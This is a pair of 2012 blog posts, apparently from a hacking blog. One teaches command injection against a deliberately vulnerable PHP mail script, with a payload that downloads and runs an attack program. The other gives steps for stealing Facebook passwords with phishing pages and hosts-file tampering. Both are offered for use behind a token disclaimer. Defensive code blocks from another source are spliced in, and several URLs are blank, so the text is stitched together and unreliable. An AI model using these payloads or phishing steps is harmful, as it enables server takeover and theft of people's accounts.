Saturday, February 11, 2012
Hack websites using Command Injection


Hey friends, previously I have explained how to use SQL injection and XPath injection to hack websites. Today I will teach you another type of injection technique that, if executed properly, can give you complete ownership of the victim's website: Command Injection. When user input is used as part of a system command, a hacker may inject system commands into the user input. Ahh.. confusing.. :P Let's understand it in clear and simple words.

What is Command Injection?
Command injection is an attack method in which we alter the dynamically generated content on a Web page by entering shell commands into an input mechanism, such as a form field that lacks effective validation constraints. We can exploit that vulnerability to gain unauthorized access to data or network resources. When users visit an affected Web page, their browsers interpret the code, which may cause malicious commands to execute in the users' computers and across their networks. The purpose of the command injection attack is to inject and execute commands specified by the attacker in the vulnerable website. In a situation like this, the application, which executes unwanted system commands, is like a pseudo system shell, and the attacker may use it as any authorized system user. However, commands are executed with the same privileges and environment as the application has. Command injection attacks are possible in most cases because of a lack of correct validation of input data, which can be manipulated by the attacker (forms, cookies, HTTP headers etc.).


This can happen in any programming language, but it's very common in Perl, PHP and shell-based CGI. It is less common in Java, Python and C++ ..:P I haven't tried it there yet :D I tried once or twice but was not able to do so, that's why it is uncommon..:P

Let's understand things using examples
Consider the below PHP code:
$email_subject = "Welcome to HackingLoops";

// Vulnerable: the email parameter goes into the shell command unvalidated
if (isset($_GET['email'])) {
    system("mail " . $_GET['email'] . " -s '" . $email_subject .
        "' < /tmp/email_body", $return_val);
}
The above code is an example where the user sends his or her email address in the email parameter, and that user input is placed directly in the system command. Ahh... loophole...
Now, similar to SQL injection or XPath injection, our goal is to inject the shell command into the email parameter while making sure the code before and after the email parameter remains syntactically correct, otherwise the injection will not execute.
Consider the system() call as a small jigsaw puzzle game where we arrange different puzzle parts to make a single image. All the parts except one are in place; now we have to find the middle part to finish the puzzle.. :D A simple task in a game but a little tricky in command injection. So our objective is something like what is shown below:
mail  [missing puzzle part]  -s  'Welcome to HackingLoops'  </tmp/email_body
Note: For the missing puzzle part, we need to ensure that the mail command runs properly and exits properly. Basically I want to focus on syntax: it should be syntactically correct.

For example, mail --help will run and exit properly. Now we can add other additional shell commands by separating the commands with a semicolon (;).
We can also comment out whatever follows the missing puzzle part by ending it with the shell comment symbol (#). So we can manipulate the missing puzzle part as below:
--help; wget;  ./attack_program #
Now, adding our missing puzzle part to the original existing shell command, the below shell command is created:
mail --help; wget; ./attack_program # -s 'Welcome to HackingLoops' < /tmp/email_body

This resulting command is equivalent to the below command:
mail --help; wget; ./attack_program
Now what will the above command do..:P You all guys are just reading things like novice hackers.. Any guess...:P OK.. let me explain..
The above shell command will run mail --help and then download the attack program from  and execute it on the victim, allowing the hacker to perform arbitrary commands on the vulnerable website. In most cases this provides complete access to the root directory..:P Now do whatever you want to do..
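For contrast with the vulnerable system() call above, here is a hardened version of the same mail step. It is an added example, not code from the original post; it assumes PHP 7.4 or later (array form of proc_open), a mail binary on PATH, and the same /tmp/email_body file, and the function names are hypothetical.

```php
<?php
// Added example, not code from the original post.
// Assumptions: PHP >= 7.4 (array form of proc_open), a `mail` binary on PATH,
// and the /tmp/email_body file used by the post's snippet.

// Accept only a syntactically valid address that cannot be read as an option.
function is_safe_recipient(string $email): bool
{
    // The post's payload fails here: it has spaces and no user@domain part.
    if (filter_var($email, FILTER_VALIDATE_EMAIL) === false) {
        return false;
    }
    // A valid local part may start with "-"; `mail` would parse that as a flag.
    return $email[0] !== '-';
}

function send_welcome(string $email, string $subject): int
{
    if (!is_safe_recipient($email)) {
        throw new InvalidArgumentException('rejected recipient address');
    }
    // Validation is not the only barrier: with the array form every element is
    // exactly one argv entry and no shell runs, so ";", "#", "|" or backticks
    // in $email or $subject are never interpreted.
    $cmd  = ['mail', '-s', $subject, $email];
    $spec = [
        0 => ['file', '/tmp/email_body', 'r'],   // replaces "< /tmp/email_body"
        1 => ['file', '/dev/null', 'w'],
        2 => ['file', '/dev/null', 'w'],
    ];
    $proc = proc_open($cmd, $spec, $pipes);
    if (!is_resource($proc)) {
        throw new RuntimeException('could not start mail');
    }
    return proc_close($proc);                    // exit status of mail
}

// Constructed inputs: the payload shape from the post and a normal address.
// Only the validation step is exercised here; nothing is sent.
foreach (['--help; wget; ./attack_program #', 'alice@example.com'] as $input) {
    echo is_safe_recipient($input) ? 'accept' : 'reject', "\t", $input, PHP_EOL;
}
```

Where the array form of proc_open is not available, wrapping the validated address in escapeshellarg() is the fallback, and the leading "-" check stays necessary because quoting does not stop option parsing.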
That's all, my friends. I hope that you all have enjoyed the tutorial; if you have any doubts or queries, ask me in the form of comments.
Copycats, it's the last warning from HackingLoops: stop copying our articles. If you copy articles, always mention the source. Otherwise get ready for a DMCA penalty and a negative rating on Google.

Friday, February 3, 2012
How to Hack Facebook account or password


Facebook is becoming more secure day by day; it daily fixes several bugs found by users. Recently we have noticed that it has also tried to fix the phishing loophole by validating the previous URL from which the user arrives at Facebook. It validates the source from which the user is arriving, and if it's a fake Facebook page, it warns its users: Please Change your Password Immediately as you might be a victim of Phishing. This validation made Facebook account passwords secure from thousands of novice and script-kiddie hackers, but L33T still can't be stopped, as L33Ts never stop; they keep on moving to new alternatives.
So we moved to advanced modes of phishing like tabnabbing, the meta refresh trick, browser-side bypassing and even manipulating host (a hint is sufficient, as I will not disclose this one).. When I feel bored I use this technique to hack accounts and passwords of Facebook. Just try to figure out what we can do using the Host File :P ..Not going to tell more than that...
Ok.... Ok... Let's learn today the technique called Host Name IP mapped based Phishing. You all will be really happy to know that I have written my third white paper on the same topic, and you will be more than happy to know that this technique of phishing was invented by Lokesh Singh (:P none other than me...).. So friends, let's start our tutorial.


Note: This is for Educational Purposes only. Don't misuse it.:P Please...

1. Facebook latest Phisher or Fake Pages.
2. Free Web hosting server to upload those Phish Pages.
3. Spoofing URL using Host name mapping technique.

Let me provide you a little background on what I will teach you today. I know most of you already know phishing, but for first timers, let me explain a bit. Phish pages are fake pages that look absolutely similar to the original pages, and the technique of using those fake pages to hack anyone's user name and password is called phishing. The technique we use to send these fake pages to the victim and prompt him to believe that they are real is called social engineering. But I think this we already know; what's new are we going to discuss today.. Ahhh... Just wait and hold your pants tight, because today I will be breaking all the policies and ethical norms, because until and unless we know how hackers do things we will never be able to stand in front of them.

What is New???
We all know that fake pages can only be detected using two techniques:
1. Verifying the URL in the address bar: if it's a fake page, then the URL must be different from the original one.
2. Using any web security toolbar that warns users about fake pages, like the AVG toolbar, Norton Online security toolbar etc..
But what if you open manually in your web browser and the fake page opens while the URL in the web browser remains only. That means the first technique to detect a fake page goes in vain. Now for the second technique: all online web security toolbars detect fake pages by comparing the input by the user in the URL address bar with the original page URL. If both match, then it's not a fake page; otherwise it's a malware page.
So friends, today I will teach you how to make your fake pages open whenever the victim opens Facebook in his/her web browser. Ahhh... You will now be thinking it's impossible. But as I have told you, I have written a white paper on Advanced Phishing techniques. So it's 110% possible to load a fake web page whenever the user opens or any other website like Yahoo, Hotmail or anything... Below are the steps and video for the same.
I have made the video as well as written the steps in detail, which will tell you everything step by step.

Steps to Hack Facebook account or Password:
1. Download the Latest Facebook Phisher.
2. Extract the files, you will get below 4 files:

  • index.php
  • facebook1.php
  • passwords.html
  • thanks.php
3. Now go to any free web hosting web server to upload these fake pages.
Note that all should be uploaded at root, meaning not in any folder. Just at the first-level directory.

4. Now you need to find the correct IP address of the account you have created on the web hosting server.
5. When you get your fake page's IP address, what we need to do is add the entry of the IP address against the in victim's host file located at below location.
6. There are several ways of doing that. I have written my own PHP scripts for doing the same, but I cannot share them with you guys because there are chances of misusing them. So I explain the logic to you, and the rest you need to figure out: how you will edit the victim's host file and append your Fake Page IP address against

7. Now after doing steps 5 and 6, whenever the user opens the, your fake Facebook page will open and the victim will never be able to visit the original Facebook, so he will not even be able to change his password...:P

8. I have added an extra logic to my scripts: whenever the victim enters the password and hits the enter button, I am removing the entry of the Fake IP address against from the host file by making it spaces. So it will be for him for one time only, which sounds more spoofed. It's just a single line of code, but I cannot tell you guys because it will make this article completely unethical.
I will teach you techniques but I will not do spoon feeding, because if you want to become a good hacker then you need to use your brain too. I love to be called Destructive but I do constructive works..:P like this one...rofl...

9. Everything other than this is similar to normal phishing technique..
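
The host file tampering that steps 5 to 8 rely on can be checked for from the defender's side. The script below is an added example, not the author's script; the watched domain, the sample host file content and the function name are constructed for illustration.

```php
<?php
// Added example, not the author's script. The watchlist and the sample hosts
// content are constructed; pass a real hosts file path as the first CLI
// argument to scan that file instead.

// Return every hosts entry that pins a watched domain (or a subdomain) to an IP.
function audit_hosts(string $content, array $watch): array
{
    $findings = [];
    foreach (preg_split('/\R/', $content) as $i => $line) {
        $line = trim(preg_replace('/#.*$/', '', $line));   // strip comments
        if ($line === '') {
            continue;
        }
        $fields = preg_split('/\s+/', $line);
        $ip = array_shift($fields);                        // first field: address
        foreach ($fields as $name) {                       // rest: host names
            $name = strtolower(rtrim($name, '.'));
            foreach ($watch as $domain) {
                $suffix = '.' . $domain;
                if ($name === $domain || substr($name, -strlen($suffix)) === $suffix) {
                    $findings[] = ['line' => $i + 1, 'ip' => $ip, 'host' => $name];
                }
            }
        }
    }
    return $findings;
}

$sample = <<<HOSTS
127.0.0.1    localhost
::1          localhost
# constructed tampered entry below (203.0.113.0/24 is a documentation range)
203.0.113.7  www.social.example social.example
HOSTS;

$watch   = ['social.example'];   // hypothetical high-value login domain
$content = isset($argv[1]) ? (string) file_get_contents($argv[1]) : $sample;

foreach (audit_hosts($content, $watch) as $f) {
    printf("line %d: %s pinned to %s\n", $f['line'], $f['host'], $f['ip']);
}
```

Because step 8 removes the entry after the first login, a scheduled scan can miss it; file-integrity monitoring on the host file catches the write itself.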

I hope you all like it... If not, here is the video of the complete hack in detail with each and every step shown practically.
Note: In the video I am using my localhost as the web server, which in your case will be or other means where you uploaded your files.
Also you must know is localhost IP address. For your case your webhosting will be the IP address that will be used to map against facebook.

I hope you all love this tutorial :P you have to... Because it's the best method for hacking anyone's account..
At least I can hope this article deserves a big smile on your face with looks of being shocked and an appreciation comment that will make me smile...:D